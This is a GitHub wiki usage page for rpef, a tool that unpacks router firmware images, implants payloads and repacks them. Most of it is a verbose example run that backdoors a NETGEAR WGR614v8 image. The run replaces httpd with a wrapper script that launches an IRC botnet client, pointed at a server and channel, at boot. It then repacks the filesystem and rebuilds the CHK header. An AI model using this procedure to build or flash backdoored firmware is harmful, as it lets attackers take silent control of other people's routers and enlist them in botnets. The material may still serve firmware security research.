Usage Documentation - mncoppola/rpef GitHub Wiki

Currently, the framework includes a number of firmware image modules:

  • 'Verified' - This module is confirmed to work and is stable.
  • 'Unverified' - This module is believed to work or should work with little additional effort, but awaits being tested on a physical device.
  • 'Testing' - This module is currently undergoing development and is unstable for the time being. Users should consider this module a "work in progress."
  • 'Roadblock' - Issues have halted progress on this module for the time being. Certain unavailable utilities or significant reverse engineering work may be necessary.

For a list of options, run:

python rpef.py -h

For a list of all currently supported firmware targets, run:

python rpef.py -ll

A Little Architecture

The script is written for Python 2.6 and may require the installation of a few modules. It is typically invoked as:

python rpef.py <firmware image> <output file> <payload>

and accepts a number of optional switches (see -h).

The rules/ directory stores a hierarchy of rules/<vendor>/<module> directories. One module correlates to one firmware checksum (not to one specific router) since multiple routers have been observed to run the exact same firmware. Within each module is properties.json which stores the language and order of operations necessary to unpackage, backdoor, and repackage the target firmware image. The payloads/ directory stores cross-compiled binaries ready for deployment, and the optional dependencies/ directory stores miscellaneous files to aid the process.

The utilities/ directory stores pre-compiled x86 binaries to perform tasks such as packing/unpacking filesystems, compressing/decompressing data (for which no suitable .py module exists), and calculating checksums.

The payloads_src/ directory stores source code for the payloads themselves. All payloads are written from scratch to keep them as small as possible.

Example Usage

To verbosely generate a firmware image for the WGR614v8 backdoored with a botnet client, run:

python rpef.py WGR614v8-V1.2.10_21.0.52NA.chk WGR614v8-V1.2.10_21.0.52NA_backdoor.chk botnet -v

And the process should proceed as follows:

[+] Verifying checksum
	Calculated checksum: 38f238872cfb32844663a8a7d47e93d5
	Matched target: NETGEAR WGR614v8 1.2.10NA (Verified)
[+] Extracting parts from firmware image
	Step 1: Extract WGR614v8-V1.2.10_21.0.52NA.chk, Offset 58, Size 506252 -> /tmp/tmpnIWTqZ/headerkernel.bin
	Step 2: Extract WGR614v8-V1.2.10_21.0.52NA.chk, Offset 506310, Size 3063844 -> /tmp/tmpnIWTqZ/filesystem.bin
[+] Unpacking filesystem
	Step 1: unsquashfs-1.0 /tmp/tmpnIWTqZ/filesystem.bin -> /tmp/tmpnIWTqZ/extracted_fs
		Executing: utilities/unsquashfs-1.0 -dest /tmp/tmpnIWTqZ/extracted_fs /tmp/tmpnIWTqZ/filesystem.bin
		
		created 317 files
		created 32 directories
		created 53 symlinks
		created 0 devices
		created 0 fifos
[+] Inserting payload
	Step 1: Copy rules/NETGEAR/WGR614v8_1.2.10NA/payloads/botnet /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/botnet
	Step 2: Move /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd.bak
	Step 3: Touch /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
	Step 4: Appendtext "#!/bin/msh
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
[+] INPUT REQUIRED, IP address of IRC server: 1.2.3.4
[+] INPUT REQUIRED, Port of IRC server: 6667
[+] INPUT REQUIRED, Channel to join (include #): #busticati
[+] INPUT REQUIRED, Prefix of bot nick: awesome
	Step 5: Appendtext "/usr/sbin/botnet 1.2.3.4 6667 \#busticati awesome &
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
	Step 6: Appendtext "/usr/sbin/httpd.bak
" >> /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
	Step 7: Chmod 777 /tmp/tmpnIWTqZ/extracted_fs/usr/sbin/httpd
[+] Building filesystem
	Step 1: mksquashfs-2.1 /tmp/tmpnIWTqZ/extracted_fs, Blocksize 65536, Little endian -> /tmp/tmpnIWTqZ/newfs.bin
		Executing: utilities/mksquashfs-2.1 /tmp/tmpnIWTqZ/extracted_fs /tmp/tmpnIWTqZ/newfs.bin -b 65536 -root-owned -le
		Creating little endian 2.1 filesystem on /tmp/tmpnIWTqZ/newfs.bin, block size 65536.
		
		Little endian filesystem, data block size 65536, compressed data, compressed metadata, compressed fragments
		Filesystem size 2995.07 Kbytes (2.92 Mbytes)
			31.14% of uncompressed filesystem size (9616.55 Kbytes)
		Inode table size 3317 bytes (3.24 Kbytes)
			34.70% of uncompressed inode table size (9558 bytes)
		Directory table size 3237 bytes (3.16 Kbytes)
			52.41% of uncompressed directory table size (6176 bytes)
		Number of duplicate files found 5
		Number of inodes 404
		Number of files 319
		Number of fragments 30
		Number of symbolic links  53
		Number of device nodes 0
		Number of fifo nodes 0
		Number of socket nodes 0
		Number of directories 32
		Number of uids 1
			root (0)
		Number of gids 0
[+] Gluing parts together
	Step 1: Touch WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
	Step 2: Appendfile /tmp/tmpnIWTqZ/headerkernel.bin >> WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
	Step 3: Appendfile /tmp/tmpnIWTqZ/newfs.bin >> WGR614v8-V1.2.10_21.0.52NA_backdoor.chk
[+] Padding image with null bytes
	Step 1: Pad WGR614v8-V1.2.10_21.0.52NA_backdoor.chk to size 3575808 with 0 (0x00)
[+] Generating CHK header
	Step 1: packet WGR614v8-V1.2.10_21.0.52NA_backdoor.chk rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/compatible.txt rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/ambitCfg_NA.h
		Executing: utilities/packet -k WGR614v8-V1.2.10_21.0.52NA_backdoor.chk -b rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/compatible.txt -i rules/NETGEAR/WGR614v8_1.2.10NA/dependencies/ambitCfg_NA.h
[+] Removing temporary files
	Step 1: Rmdir /tmp/tmpnIWTqZ/
Add a custom footer
⚠️ **GitHub.com Fallback** ⚠️